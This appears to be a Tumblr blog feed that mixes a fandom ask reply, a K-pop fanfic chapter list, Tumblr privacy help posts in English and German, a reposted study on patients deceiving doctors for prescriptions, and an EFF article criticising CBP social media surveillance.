#003. anonymous user
Note
What do you mean Hoyoverse supporters and defenders? /gen I didn’t think they did anything bad aside from making gacha games, I’m out of the loop. Also you post a lot of Hoyoverse characters I think, they’re Genshin Impact right?
It's self explanatory tbh, people who support & defend hoyoverse. They have a track history of racism (hi3 gi at least), orientalism (gi), ableism (tot, gi if you count glory), & possibly more but i'm not someone who keeps up with that. I just would rather people who defend & support that shit to stay away.
I do, & most of them are genshin, yes. I hope this doesn't sound as aggressive as it looks to me, but I don't see how that's relevant?
3 notes
·
View notes
Text
𝐅𝐄𝐕𝐄𝐑 ▸ park jongseong
PAIRING: park jongseong x fem!oc
SUMMARY: choi luna hated how everyone in her university adores and idolizes park jay, hybe university’s good-looking dance team captain. hence, she posted an anonymous rant about him on her twitter account. she didn’t know she’ll be in the middle of chaos when her friend in belift international high school mentioned park jay’s twitter user on her said tweet.
GENRE: social media au, college au, fluff, oblivious!jay, oblivious!oc, one-sided enemies to friends to lovers (slight), romance, slow burn, wholesome, crack, and humor.
FEATURING: enhypen, le sserafim, mentions of tomorrow x together
WARNING: poor grammar, misspelled words, profanity, inappropriate jokes, mentions of food, self-doubt-ish, and my broken humor.
STATUS: completed
TAGLIST: closed!!
NOTE: keep in mind that the character portrayal of enhypen, le sserafim or any members of other groups that may appear or mention in this story does NOT reflect how they are in real life in any aspect as this book is written in pure FICTION.
a/n: hellooooo~ this is my first time posting on tumblr. also, i suck at making banners, so please bear with this smau’s banner. please do NOT expect too much about this fic. there’s a lot of filler chapters and just lame in general, i don’t want to disappoint y’all.
yes, le sserafim’s yunjin is my oc’s face claim because i love her will all my heart. stan enhypen & le sserafim everyone!
PROFILES: SUITE LIFE OF EUNCHAE & RIKI | JAY & HIS PROBLEMS
CHAPTERS:
001 ... be careful what you wish for ;)
002 ... i don’t know what just happened.
003 ... that was me being stupid
004 ... do you want us to get kicked in the ass?
005 ... oh, baby...
006 ... how can i change your mind?
007 ... i <3 u too
008 ... that cat is jay’s tail
009 ... can’t wait to meet that adorable young man
010 ... yeah, what Jay said
011 ... can’t say the same lol
012 ... when someone cooked better than you.
013 ... i know.
014 ... i love you already.
015 ... you think they can stop me
016 ... if i didn’t know you already, i’d say you like jay secretly
017 ... YOUR WHAT???
018 ... i’m telling Yeonjun.
019 ... make up your mind girl
020 ... YOU GUYS WENT OUT AND DIDN’T TOLD ME?!!!
021 ... 🦋
022 ... tf????
023 ... chill the f out
024 ... are you fr done with it though
025 ... bye everyone
026 ... yes. us too.
027 ... doctor strange
028 ... i will, don’t worry.
029 ... whatever guys.
030 ... no thx ❤️
031 ... ew not you
032 ... fr fr the audacity
033 ... jungwon is... jungwoning
034 ... kids these days really
035 ... i think i just died
036 ... not you too????
037 ... makes me barf
038 ... oh????
039 ... allkpop era
040 ... why so glum?
041 ... the end.
© parkjaysprada, 2022
#enhypen#enhypen x reader#park jay x reader#park jongseong x reader#enhypen social media au#enhypen smau#fluff#enhypen fluff#enhypen jay#jay smau#txt#tomorrow x together#yeonjun's sister! oc#le sserafim#au#fanfiction#enhypen fan fiction#enhypen fic#jungwon#heeseung#jay#jake#sunghoon#sunoo#riki#fever smau#parkjaysprada#parkjaysprada masterlist
180 notes
·
View notes
Text
PRI-003
Privacy
Anon Off Or Anon On?
Turning on anon for messages is a big decision. By default, Tumblr doesn’t allow your blog to receive anonymous asks. You’ll have to enable anonymous asks manually. Before you decide to turn anon on or off, consider the pros and cons.
Pros:
People will feel less nervous about contacting you which leads to more messages.
Nice anons do exist.
An anon might turn into a mutual you can talk to regularly.
People who don’t have Tumblr can communicate with you.
Cons:
Anonymity makes it easier for people to send negative comments.
It’s a one way conversation that can’t be followed up.
Spammers use anon to send unwanted messages.
While having anon on can lead to some unsavory conversations, you can block anons. To block an anonymous user, click the three little dots at the top of the message then “Block.”
Desktop
Mobile
This blocks the person’s IP address from seeing your blog and messaging you. So if they use the same wifi network but create different blogs, they can’t contact you. Even if they switch devices.
On the downside, if their internet provider gives them a rotating IP address, they can still message you. And if you block someone who is using a public network (like a cafe or library) you may end up blocking other people.
🔒
43 notes
·
View notes
Text
COM-003
Community
Sag Hallo – öffentlich oder ganz privat
Wenn du auf Tumblr Nachrichten schreibst, kannst du selbst bestimmen, wie privat oder öffentlich diese sein sollen. Und das kann manchmal genauso wichtig sein wie die Nachricht selbst. Wenn du etwas schüchtern bist, möchtest du vielleicht lieber anonym bleiben. Wenn du mit deinen Followern in Kontakt treten willst, kannst du ein öffentliches Q&A veranstalten. Diese Optionen stehen dir zur Verfügung:
Super öffentlich
Fragen (nicht anonym): Wenn du eine Frage sendest und dabei nicht die Option "Anonym fragen" aktivierst, kann die Person öffentlich auf ihrem Blog darauf antworten. Jeder kann deinen Blognamen und deine Nachricht sehen.
Einreichen (nicht anonym): Funktioniert ähnliche wie das Fragen. Aber hier kannst du etwas ✨einreichen✨.
Öffentlich
Mit Kommentar rebloggen: Wenn du einen Eintrag rebloggst und kommentierst, können deine Follower das sehen. In den Anmerkungen unter dem Eintrag werden dein Blogname und dein Kommentar angezeigt.
Auf einen Eintrag antworten: Wenn du auf einen Eintrag antwortest, werden dein Blogname und dein Kommentar angezeigt. Antworten sind aber nur in den Anmerkungen unter dem Eintrag zu sehen.
🔒 Super privat
Nachrichten: Nachrichten sind ziemlich privat, denn nur du und der User, mit dem du schreibst, können sie sehen. Aber auch hier wird dein Blogname angezeigt und theoretisch könnte jemand Screenshots erstellen.
Fragen (anonym): Der heilige Gral der privaten Nachrichten. Wenn du die Option "Anonym fragen" aktivierst, wird dein Blogname nicht in der Nachricht angezeigt. Auch Leute, die kein Tumblr haben, können anonym Fragen stellen.
Die Frage wird natürlich öffentlich gepostet, aber DU bleibst anonym.
🤝
25 notes
·
View notes
Text
Amber N. Sanders et al., Deception and Drug Acquisition: Correlates of “Success” Among Drug-Seeking Patients, 7 J Primary Care & Comm Heath 175 (2016)
Abstract
Purpose: Most research examining patient-based drug diversion neglects to assess physician deception directly. We attempt to determine if motives for deception are linked to success, and, similarly, if any health, demographic, or substance use history characteristics of the patients are predictive of being able to successfully deceive a physician.
Methods: Stratified random sampling was utilized to obtain a sample of 2349 young adults. Respondents completed a survey detailing their substance use histories and whether they had ever deceived a physician for medication. Ninety-three of these respondents reported attempting to deceive a physician for a medication and compose the analytic sample for the study.
Results: Of the 93 young adults who reported having attempted to deceive a physician for pharmaceuticals (4.0% of the general sample), 64 (68.8%) were successful. This included 24 only seeking medications for their own use, 9 only for financial purposes, and 31 with both motives. Respondents who reported recreationally using pharmaceuticals in the past were more likely to report successful attempts at obtaining a prescription compared with respondents without a history of abuse. With respect to demographic characteristics of the respondents, only race/ethnicity distinguished between successful attempts and failure.
Conclusions: Although a rare occurrence in the overall sample, significant correlates of successful deception did emerge. Respondents motivated to obtain a prescription in order to sell it to others were overwhelmingly likely to succeed in their pursuit to deceive as compared with respondents who sought prescriptions for their own abuse. Successful deceivers were also more likely to have been legitimately prescribed medication in the past. Successful respondents were more likely to be Caucasian than any other race/ethnicity.
Introduction
Prescription medication abuse, a practice both driving and facilitated by new and creative methods of drug diversion and acquisition, appears to be growing in the United States.1,2 While theft,3 fraud,4 unethical prescribing practices (ie, “pill mills”),5,6 and online outlets7 contribute to the issue, physicians must often determine whether a patient has a legitimate medical concern or is drug-seeking for the purpose of misuse, recreational use, and/or diversion. The technique of “doctor shopping,” broadly defined as attempting to obtain prescription drugs from multiple physicians or the exaggeration, or even complete feigning, of symptoms in order to acquire a prescription for which there is no legitimate medical need,3,8 appears to be widespread and a major concern of physicians.9
For physicians, attempting to identify those engaging in doctor shopping is a daunting task. Relatively healthy individuals may be efficient deceivers, well-versed in fabricating or inflating symptoms10 to obtain pharmaceuticals for themselves, to sell to others, or both. Those seeking care from additional providers for a single legitimate condition are challenging to identify in areas without an effective prescription drug monitoring program. Since it is difficult to determine if medication was previously prescribed in these areas, standard care could easily yield a second prescription.6 Current efforts to curb deception focus on physicians engaging in “patient selection” and being able to identify those who are deceptive in their account of pain and symptoms.9,10 However, such methods of selection create concern; suspicious physicians may undertreat patients generally and may specifically undertreat patients with either unusual presentations of legitimate issues or those with certain demographic or personality traits.6,9
Most research examining patient-based drug diversion neglects to assess physician deception directly. Many rely on case or cohort studies,11 retrospective self-reports of identified heavy users,12 or secondary analysis of records,13 and thus cannot give an accurate estimate of attempted deception in the general population nor detail the proportion of these individuals who are successful at obtaining medications. Stogner et al.14 describe the motives associated with attempting to deceive a physician among members of a university population, but only examined predictors of attempted deception. The present study seeks to detail what portion of those who attempted to deceive a physician in that data set were successful in obtaining the medication. More importantly, we attempt to determine if the motive for deception (financial or recreational use) is related to success, and, similarly, if any health, demographic, or substance use history characteristics of the patients are linked to being able to successfully deceive a physician.
Methods
An anonymous, voluntary self-report survey exploring substance use and high-risk behaviors was administered to students at a single large public university in the Southeastern United States (IRB #H12032). Courses were randomly selected from 2 strata (25 courses with 30-99 students and 15 courses with 100 or more enrolled students). Laboratory, online, physical education, and low-enrollment courses were not eligible for inclusion. A research assistant administered the pen and paper survey to each class. Students in multiple courses were asked to only complete the survey once. Respondents had access to campus health care, but likely utilized other practices for primary care, suggesting that an array of health care providers interacted with this group. Data collection within the forty courses yielded a final sample (response rate of 80.4%) of 2349 students (48.4% male, 68.9% white, 24.4% black, 2.8% Hispanic, and 4.0% other races) largely representative of the university’s undergraduate population (48.5% male, 65.5% white, 25.0% black, and 4.2% Hispanic).14-16 The sample yielded a higher prevalence of alcohol (87.8%) and marijuana (58.1%) than national level data (81.0% and 49.1% respectively as reported by Monitoring the Future17 in 2012).
Of the 2349 respondents, 93 (4.0%) reported attempting to deceive a physician for a medication.14 These respondents responded in the affirmative to at least 1 of 2 questions: “Have you ever attempted to get a prescription from a physician for a medication that you did not need and intended to sell?” and “Have you ever attempted to get a prescription from a physician for a medication that you did not need and intended to abuse?” As other items in the survey used the word “recreationally” when asking about pharmaceutical abuse, respondents would be unlikely to answer “yes” if they were self-diagnosing or modifying therapy to treat a malady. Forty-five of these had reported only being motivated for their own abuse (48.4% of attempted deceivers), 11 reported deception only for the purpose of selling the medication (11.8%), and 37 reported both motives (39.8%). Our analysis focuses only on these 93 respondents and evaluates potential factors linked to success at deceiving physicians among those attempting deception. Table 1 presents the number of individuals that were both successful and unsuccessful at deceiving a physician across demographic categories, substance use histories, motivation type, and legitimate medical histories. Odds ratios were calculated to indicate the magnitude of association while χ2 tests were used to determine whether these relationships were significant. Odds ratios were calculated as (Group 1 Deception Success ÷ Group 1 Deception Failures) ÷ (Group 2 Success ÷ Group 2 Failures) whereas the 95% confidence intervals were calculated as e(ln(OR) − 1.96(SEln(OR))) to e(ln(OR) + 1.96(SEln(OR))), where OR is odds ratio and SE is standard error.
Table 1. Success at Using Deception to Obtain a Prescription From a Physician.
Results
The 93 respondents that had attempted deception (58.7% male; 64.1% Caucasian) were asked whether they had ever been successful in obtaining a medication they did not need. More than two-thirds had been successful (64, 68.8%) including 31 with both motives, 24 only seeking medications for their own abuse (totaling 55 seeking medications for abuse), and 9 only for financial purposes (yielding 30 successful drug seekers intending to sell medications).
Respondents motivated to seek prescriptions for economic reasons were generally more likely to succeed than respondents only concerned with abuse. Respondents who reported being motivated by the desire for abuse or both for abuse and economic reasons had lower odds of successfully obtaining a prescription than respondents motivated by economic reasons alone. This difference, however, was not significant (OR 0.453, 95% CI 0.09-2.24, P = .322). Respondents who sought a prescription to sell, or, both to sell and to abuse, were found to have significantly greater odds of successfully obtaining a prescription than respondents motivated by only the desire for abuse (OR 4.375, 95% CI 1.68-11.41, P = .002). Respondents who reported both motives were significantly more likely to obtain a prescription than those who did not (OR 3.601, 95% CI 1.29-10.02, P = .011).
No differences in the odds of successful deception were found between respondents who reported a history of alcohol or marijuana use. However, successful deception was more likely among respondents who reported recreationally using pharmaceuticals in the past (OR 4.889, 95% CI 1.65-14.49, P = .003). Furthermore, respondents who reported being prescribed Adderall/Ritalin (OR 5.871, 95% CI 1.83-18.80, P = .001) or antidepressants (OR 13.186, 95% CI 1.68-103.77, P = .002) at some point in their lives were more likely to report successful deception compared to respondents who were never prescribed either of these medications. Respondents who reported poor health, were diagnosed with attention deficit/hyperactivity disorder, or were previously prescribed opioids were no more likely to actually obtain the sought prescription than respondents who did not report these.
With regard to demographic characteristics of the respondents, only race/ethnicity distinguished between successful attempts and failure. In particular, Caucasian respondents reported significantly more success than non-Caucasian respondents (OR 2.679, 95% CI 1.08-6.66, P = .031). Males, respondents from affluent families (earning >$100 000 per year), and self-identified LGBT individuals were no more or less likely to report successfully obtaining a prescription.
Discussion
Building off of previous research,14 which identified characteristics of patients who were likely to attempt “doctor shopping,” we explore patient characteristics that tended to correlate with successfully obtaining an unneeded prescription. Foremost, we find that respondents who had financial motives were overwhelmingly likely to report successful deception (83.3%) compared with respondents who sought prescriptions solely for abuse (53.3%). Although it is not possible to determine why these respondents were more successful, it is possible that their success may be linked to a high number of doctor deception attempts (as the survey only asked whether they were ever successful). As such, it would be beneficial for future research to investigate multiple dimensions of success, including frequency of both successful and failed attempts at doctor deception.
Furthermore, successful deceivers were also more likely to have been legitimately prescribed medications sometime in the past. This suggests that greater odds of success may be attributable to experiential knowledge making it easier to feign appropriate symptoms. Alternatively, past history of legitimate use might make physicians less cautious in prescribing. In either case, this finding suggests that the impact of effective, operational prescription drug monitoring programs could make a difference in a prescriber being able to detect which patients have been frequenting multiple physicians, receiving medication, and consequently which patients may be attempting to abuse or divert medication.
Our results show successful deceivers were more likely to be Caucasian than any other race/ethnicity. Furthermore, unlike attempting to deceive, success was neither related to gender nor sexual orientation. Thus, the traits associated with attempting deception identified within the previous study14 are not the same as traits linked to successful deception among those attempting deception. Overall, the findings of this study could possibly be attributed to some groups (non-Caucasians) being perceived as more suspicious by physicians and therefore given increased scrutiny. This may be problematic in that individuals equally or more deserving of scrutiny might be overlooked. This result further suggests a need to evaluate whether patients from marginalized groups are more frequently underprescribed or undertreated due to inappropriately heightened suspicions and discriminatory practices.
Additional research is also necessary to address some of the limitations associated with this study. First, it was not possible to determine the frequency of deception, the type of drugs sought, or the particular methods of deception. Being able to assess these features will likely aid physicians in identifying patients attempting to fraudulently obtain prescriptions. Second, like all self-report research, this study is vulnerable to the possibility of inaccurate or underreporting of deception due to social desirability on the part of respondents. Correlating patient data with self-report data to determine if a prescription was actually received might be one fruitful avenue for addressing this concern. Along the same lines, it cannot be determined with certainty that respondents were accurately reporting their intent to obtain prescriptions for abuse. Despite efforts to convey a focus on recreational use and not on self-treatment, it is possible that these were not mutually exclusive motivations. Given that a history of legitimate use was related to successful deception, it is not possible to determine if the original condition persisted at the time of attempted deception. Future studies should attempt to validate the extent to which respondents sought an unneeded prescription and their motives for doing so, since a profile of successful deception may vary on the basis of motivation. Third, given the apparent rarity of attempted deception (~4% in the current study), future studies based on general populations should attempt to obtain as large a sample as possible in order to obtain larger numbers of deceivers, which would also allow inferences to be extended beyond the university population. Finally, since physician characteristics likely play an important role in whether an attempt to deceive will be successful or not, future research should attempt to gather information on both the patient and the physician.
These limitations notwithstanding, this study investigates an important public health problem and concern for legitimate medical practitioners. Although the prevalence of attempted deception in this sample was relatively low, university students have high levels of substance abuse in general18,19 and specifically prescription drug abuse20,21 making them a well-suited population for an exploratory study such as this. This study was able to add to the literature by assessing factors associated with successful acquisition of prescription drugs in one population. Of direct relevance to clinicians, greater awareness of doctor shopping tactics, especially those that are successful, is needed. It is unlikely that the demand for prescription drugs (especially on college campuses) will decline—putting physicians at the front lines of pharmaceutical diversion and creating a need for greater awareness and vigilance of successful diversion tactics.
References
Johnston, LD, O’Malley, PM, Miech, RA, Bachman, JG, Schulenberg, JE. Monitoring the Future National Survey Results on Drug Use: 1975-2013: Overview, Key Findings on Adolescent Drug Use. Ann Arbor, MI: Institute for Social Research, The University of Michigan; 2014.
Substance Abuse and Mental Health Services Administration . Prescription drug misuse remains a top public health concern. http://www.samhsa.gov/newsroom/advisories/1301084404.aspx. Published January 8, 2013. Accessed May 1, 2014.
Inciardi, JA, Surratt, HL, Kurtz, SP, Cicero, TJ. Mechanisms of prescription drug diversion among drug-involved club-and street-based populations. Pain Med. 2007;8:171-183.
Singh, N, Fishman, S, Rich, B, Orlowski, A. Prescription opioid forgery: reporting to law enforcement and protection of medical information. Pain Med. 2013;14:792-798.
Rigg, KK, March, SJ, Inciardi, JA. Prescription drug abuse & diversion: role of the pain clinic. J Drug Issues. 2010;40:681-702.
Gugelmann, H, Perrone, J, Nelson, L. Windmills and pill mills: Can PDMPs tilt the prescription drug epidemic? J Med Toxicol. 2012;8:378-386.
Karberg, J . Progress in the challenge to regulate online pharmacies. J Law Health. 2010;23:113-142.
Wang, J, Christo, PJ. The influence of prescription monitoring programs on chronic pain management. Pain Physician. 2009;12:507-515.
Hurwitz, W . The challenge of prescription drug misuse: a review and commentary. Pain Med. 2005;6:152-161.
Jung, B, Reidenberg, MM. Physicians being deceived. Pain Med. 2007;8:433-437.
Cepeda, MS, Fife, D, Chow, W, Mastrogiovanni, G, Henderson, SC. Opioid shopping behavior: How often, how soon, which drugs, and what payment method. J Clil Pharmacol. 2013;53:112-117.
Fountain, J, Strang, J, Gossop, M, Farrel, M, Griffiths, P. Diversion of prescribed drugs by drug users in treatment: analysis of the UK market and new data from London. Addiction. 2000;95:393-406.
Grover, CA, Elder, JW, Close, RJ, Curry, SM. How frequently are “classic” drug-seeking behaviors used by drug-seeking patients in the emergency department? West J Emerg Med. 2012;13:416-421.
Stogner, JM, Sanders, A, Miller, BL. Deception for drugs: a demographic profile of “doctor shopping”. J Am Board Fam Med. 2014;27:583-593.
Stogner, JM, Miller, BL. A spicy kind of high: a profile of synthetic cannabinoid users. J Subst Use. 2014;19:199-205.
Agnich, LE, Stogner, JM, Miller, BL, Marcum, CD. Purple drank prevalence and characteristics of misusers of codeine cough syrup mixtures. Addict Behav. 2013;38:2445-2449.
Johnston, LD, O’Malley, PM, Bachman, JG, Schulenberg, JE. Monitoring the Future National Survey Results on Drug Use, 1975-2012. Volume II: College Students and Adults Ages 19-50. Ann Arbor, MI: Institute for Social Research, The University of Michigan; 2013.
Prendergast, ML . Substance use and abuse among college students: a review of recent literature. J Am Coll Health. 1994;43:99-113.
O’Grady, K E, Arria, AM, Fitzelle, DM, Wish, ED. Heavy drinking and polydrug use among college students. J Drug Issues. 2008;38:445-465.
Kolek, EA . Recreational prescription drug use among college students. NASPA J. 2009;46:519-539.
McCabe, SE, Knight, JR, Teter, CJ, Wechsler, H. Non-medical use of prescription stimulants among US college students: prevalence and correlates from a national survey. Addiction. 2005;100:96-106.
#medicine#medical encounter#deception#drugs#drug diversion#drug misuse#deceptive patients#drug-seeking#drug-seeking patients#pharmaceutical abuse#pain medication#doctor shopping#doctor deception#studies#demographics
0 notes
Text
DEEP DIVE: CBP’s Social Media Surveillance Poses Risks to Free Speech and Privacy Rights
The U.S. Department of Homeland Security (DHS) and one of its component agencies, U.S. Customs and Border Protection (CBP), released a Privacy Impact Assessment [.pdf] on CBP’s practice of monitoring social media to enhance the agency’s “situational awareness.” As we’ve argued in relation to other government social media surveillance programs, this practice endangers the free speech and privacy rights of Americans.
“Situational Awareness”
The Privacy Impact Assessment (PIA) states that CBP searches public social media posts to bolster the agency’s “situational awareness”—which includes identifying “natural disasters, threats of violence, and other harmful events and activities” that may threaten the safety of CBP personnel or facilities, including ports of entry.
The PIA aims to inform the public of privacy and related free speech risks associated with CBP’s collection of personally identifiable information (PII) when monitoring social media. CBP claims it only collects PII associated with social media—including a person’s name, social media username, address or approximate location, and publicly available phone number, email address, or other contact information—when “there is an imminent threat of loss of life, serious bodily harm, or credible threats to facilities or systems.”
Why Now?
It is unclear why DHS and CBP released this PIA now, especially since both agencies have been engaging in social media surveillance, including for situational awareness, for several years.
The PIA cites authorizing policies DHS Directive No. 110-01 (June 8, 2012) [.pdf] and DHS Instruction 110-01-001 (June 8, 2012) [.pdf] as governing the use of social media by DHS and its component agencies (including CBP) for various “operational uses,” including situational awareness. The PIA also cites CBP Directive 5410-003, “Operational Use of Social Media” (Jan. 2, 2015), which does not appear to be public. EFF asked for the release of this document in a coalition letter sent to the DHS acting secretary in May.
Federal law requires government agencies to publish certain documents to facilitate public transparency and accountability related to the government’s collection and use of personal information. The E-Government Act of 2002 requires a PIA “before initiating a new collection of information that will be collected, maintained, or disseminated using information technology” and when the information is “in an identifiable form.” Additionally, the Privacy Act of 1974 requires federal agencies to publish Systems of Records Notices (SORNs) in the Federal Register when they seek create new “systems of records” to collect and store personal information, allowing for the public to comment.
This appears to be the first PIA that CBP has written related to social media monitoring. The PIA claims that the related SORN on social media monitoring for situational awareness is DHS/CBP-024 Intelligence Records System (CIRS) System of Records, 82 Fed. Reg. 44198 (Sept. 21, 2017). Given that DHS issued directives in 2012 and CBP issued a directive in 2015 around social media monitoring, this PIA comes seven years late. Moreover, there is no explanation as to why the SORN was published two years after CBP’s 2015 directive, nor why the present PIA was published two years after the SORN.
In March, CBP came under scrutiny for engaging in surveillance of activists, journalists, attorneys, and others at the U.S.-Mexico border, with evidence suggesting that their social media profiles had been reviewed by the government. DHS and CBP released this PIA only three weeks after that scandal broke.
Chilling Effect on Free Speech
CBP’s social media surveillance poses a risk to the free expression rights of social media users. The PIA claims that CBP is only monitoring public social media posts, and thus “[i]ndividuals retain the right and ability to refrain from making information public or, in most cases, to remove previously posted information from their respective social media accounts.”
While social media users retain control of their privacy settings, CBP’s policy chills free speech by causing people to self-censor—including curbing their public expression on the Internet for fear that CBP could collect their PII for discussing a topic of interest to CBP. Additionally, people running anonymous social media accounts might be afraid that PII collected could lead to their true identities being unmasked, despite that the Supreme Court has long held that anonymous speech is protected by the First Amendment.
This chilling effect is exacerbated by the fact that CBP does not notify users when their PII is collected. CBP also may share information with other law enforcement agencies, which could result in immigration consequences or being added to a government watchlist. Finally, CBP’s definition of situational awareness is broad, and includes “information gathered from a variety of sources that, when communicated to emergency managers and decision makers, can form the basis for incident management decision making.”
We have seen this chilling effect play out in real life. Only three weeks before DHS and CBP released this PIA, NBC7 San Diego broke the story that CBP, along with other DHS agencies, created a secret database of 59 activists, journalists, and attorneys whom the government flagged for additional screening at the U.S. border because they were allegedly associated with the migrant caravan. Dossiers on certain individuals included pictures from social media and notations of designations such as “administrator” of a Facebook group providing support to the caravan, indicating that the government had surveilled their social media profiles.
As one lawyer stated, “It has a real chilling effect on people who might go down [to the border].” A journalist who was on the list of 59 individuals said the “increased scrutiny by border officials could have a chilling effect on freelance journalists covering the border.”
EFF joined a coalition letter to the DHS acting secretary about CBP’s secret dossiers. Several senators wrote a follow-up letter [.pdf]. In mid-May, CBP finally admitted to targeting journalists and others at the border, but justified its actions by claiming, without evidence, that journalists had “some level of participation in the violent incursion events.”
CBP’s Practices Don’t Mitigate Risks to Free Speech
The PIA claims that any negative impacts on free speech of social media surveillance are mitigated by both CBP policy and the Privacy Act’s prohibition on maintaining records of First Amendment activity. Yet, these supposed safeguards ultimately provide little protection.
First Amendment
The PIA emphasizes that CBP personnel are trained to “use a balancing test” to determine whether social media information presents a “credible threat”—as opposed to First Amendment-protected speech—and thus may be collected. According to the PIA, the balancing test involves gauging “the weight of a First Amendment claim, the severity of the threat, and the credibility of the threat.” However, this balancing test has no basis in constitutional law.
The Supreme Court has a long line of decisions that have established when speech rises to the level of a true threat or incitement to violence and is thus unprotected by the First Amendment.
In Watts v. United States (1969), the Supreme Court held that under the First Amendment only “true threats” may be punishable. The Court stated that alleged threats must be viewed in context, and noted that in the “political arena” in particular, language “is often vituperative, abusive, and inexact.” Thus, the Court further held that “political hyperbole” is not a true threat. In Elonis v. United States (2015), the Supreme Court held that an individual may not be criminally prosecuted for making a true threat based only on an objective test of negligence, i.e., whether a reasonable person would have understood the communication as a threat. Rather, the defendant’s subjective state of mind must be considered, including whether he intended to make a threat or knew that his statement would be viewed as a threat. (The Court left open whether a recklessness standard would also be sufficient for the speech to fall out of First Amendment protections.)
Additionally, in Brandenburg v. Ohio (1969), the Supreme Court held that “the constitutional guarantees of free speech and free press do not permit a State to forbid or proscribe advocacy of the use of force or of law violation except where such advocacy is directed to inciting or producing imminent lawless action and is likely to incite or produce such action.” There, the Court struck down an Ohio law that penalized individuals who advocated for violence to accomplish political reform, holding that the abstract advocacy of violence “is not the same as preparing a group for violent action and steeling it to such action.” In Hess v. Indiana (1973), the Court further clarified that speech that is mere “advocacy of illegal action at some indefinite future time,” is “not directed to any person or group of persons,” and is unsupported by evidence or rational inference that the speaker’s words were “intended to produce, and likely to produce, imminent disorder,” remains protected by the First Amendment. Similarly, the Court in NAACP v. Claiborne Hardware Co. (1982), held that “[a]n advocate must be free to stimulate his audience with spontaneous and emotional appeals for unity and action in a common cause. When such appeals do not incite lawless action, they must be regarded as protected speech.”
While the PIA states that CBP considers threatening posts to be those that “infer an intent, or incite others, to do physical harm or cause damage, injury, or destruction,” the PIA does not fully embrace the nuances of the Supreme Court’s jurisprudence—and CBP’s balancing test fails to comport with constitutional law. A seemingly threatening social media post may, in fact, be protected by the First Amendment if it is political hyperbole or other contextual facts suggest that the speaker did not intend to make a threat or did not believe that readers would view the post as a threat. Furthermore, a social media post that advocates for violence against CBP facilities or personnel may nevertheless be protected by the First Amendment if it is not directed at any particular person or group, and evidence does not reasonably indicate that the speaker intended to incite imminent violence or illegal action, or that imminent violence or illegal action is likely to result from the speech.
Thus, CBP may be collecting social media information and related PII even when the speech is protected by the First Amendment—contrary to its own policy—and further contributing to the chilling effect of CBP’s social media surveillance program.
Privacy Act
The PIA also mentions the Privacy Act, a federal law that establishes rules about what type of information the government can collect and keep about U.S. persons. In particular, the PIA points to 5 U.S.C. § 552a(e)(7), the prohibition against federal agencies maintaining records “describing how any individual exercises rights guaranteed by the First Amendment.”
Unfortunately, this prohibition is followed by an exception that effectively swallows the rule—that information about First Amendment activity may be collected if it is “pertinent to and within the scope of an authorized law enforcement activity.”
In Raimondo v. FBI, a Privacy Act case currently before the Ninth Circuit, the FBI kept surveillance files for “threat assessments” on two individuals who ran an antiwar website. EFF argued in an amicus brief against an expansive interpretation of the Privacy Act’s law enforcement activity exception in light of modern technology—specifically, given the ease with which law enforcement can collect, store, and share information about First Amendment activity on the internet, such information should not be stored “in government files in perpetuity when the record is not relevant to an active investigation.” We reminded the Ninth Circuit that in MacPherson v. I.R.S. (1986), the court recognized that “even ‘incidental’ surveillance and recording of innocent people exercising their First Amendment rights may have a ‘chilling effect’ on those rights that (e)(7) [of the Privacy Act] was intended to prohibit.”
Raimondo demonstrates the seemingly limitless nature of the law enforcement activity exception, including allowing for the indefinite retention of records of online activism and journalism, activity that is clearly protected by the First Amendment.
Similarly, under this PIA, because CBP follows a “credible threat” assessment not rooted in the First Amendment and the Privacy Act’s law enforcement activity exception can be interpreted broadly, CBP could very well collect and retain information that is protected by the First Amendment.
Unidentified Government Social Media Profiles Pose Risk to User Privacy
The PIA inspires little confidence not only in DHS and CBP’s interpretation of the law related to protected speech, but also in CBP personnel’s ability to follow the agencies’ own policies related to respecting social media users’ privacy.
The PIA states that CBP personnel “may conceal their identity when viewing social media for operational security purposes,” effectively allowing CBP agents to create fake accounts. However, this provision conflicts with DHS’s 2012 directive, which requires employees to “[u]se online screen names or identities that indicate an official DHS affiliation and use DHS email addresses to open accounts used when engaging in social media in the performance of their duties.”
Moreover, if, as according to the PIA, CBP personnel do not engage with other social media users and may only monitor “publicly available, open source social media,” it begs the question: why would a CBP agent need to create a fake account? Public posts or information are equally available to all social media users on a platform. Why would CBP personnel need to conceal their identity before viewing a publicly available post if they are not attempting to engage with a user?
This concern is backed by past practices where DHS agencies used fake profiles and interacted with users during the course of monitoring their social media activity. Earlier this year, journalists revealed that U.S. Immigration and Customs Enforcement (ICE) officers created fake Facebook and LinkedIn profiles to lend legitimacy to a sham university intended to identify individuals allegedly engaged in immigration fraud. There, ICE officers friended other users and exchanged emails with students, thereby potentially bypassing social media privacy settings and gaining access to information intended to remain private.
Such practices not only violate DHS’ existing policies, but also allow law enforcement to obtain access to content that would otherwise require a probable cause warrant. Furthermore, fake profiles violate the policies of several social media platforms. Facebook has publicly stated that law enforcement impersonator profiles violate the company’s terms of service.
Fighting Back
The CBP PIA is just one sliver of a broad federal government campaign to engage in social media surveillance. DHS, through its National Operations Center, has been monitoring social media for “situational awareness” since at least 2010. DHS also has been monitoring social media for intelligence gathering purposes. More recently, DHS and the State Department have greatly expanded social media surveillance to vet visitors and immigrants to the U.S., which EFF and other civil society groups have consistently opposed.
Several congressional committees have the responsibility and the opportunity to review CBP’s budget and provide oversight of the agency’s operations, including its social media surveillance. At a minimum, EFF urges these committees to ensure that CBP is following DHS’ own policies and is reporting, both to Congress and the public, how often officers are engaging in social media monitoring to understand the prevalence and scale of this program. Fundamentally, Congress should be asking why social media surveillance programs are necessary for public safety. Additionally, Congress has the responsibility to ensure that CBP and DHS are abiding by settled case law respecting the free speech and privacy rights of Americans and foreign travelers.
We’re also pushing social media companies to do more when they identify law enforcement impersonator profiles at the local, state, and federal level. Earlier this year, Facebook’s legal staff demanded that the Memphis Police Department “cease all activities on Facebook that involve the use of fake accounts or impersonation of others.” Additionally, Facebook updated its “Information for Law Enforcement Authorities” page to highlight how its misrepresentation policy also applies to police. While EFF applauds these steps, we are skeptical that warnings or policy changes alone will deter the activity. Facebook says it will delete accounts brought to its attention, but too often these accounts only become publicly known—through a lawsuit or a media report—long after the damage has been done. Instead, EFF is calling on Facebook to take specific steps to provide transparency into these law enforcement impersonator accounts by notifying users who have interacted with these accounts, following the Santa Clara Principles when removing the law enforcement accounts, and adding notifications to agencies’ Facebook pages to inform the public when the agencies’ policies permit impersonator accounts in violation of Facebook’s policy.
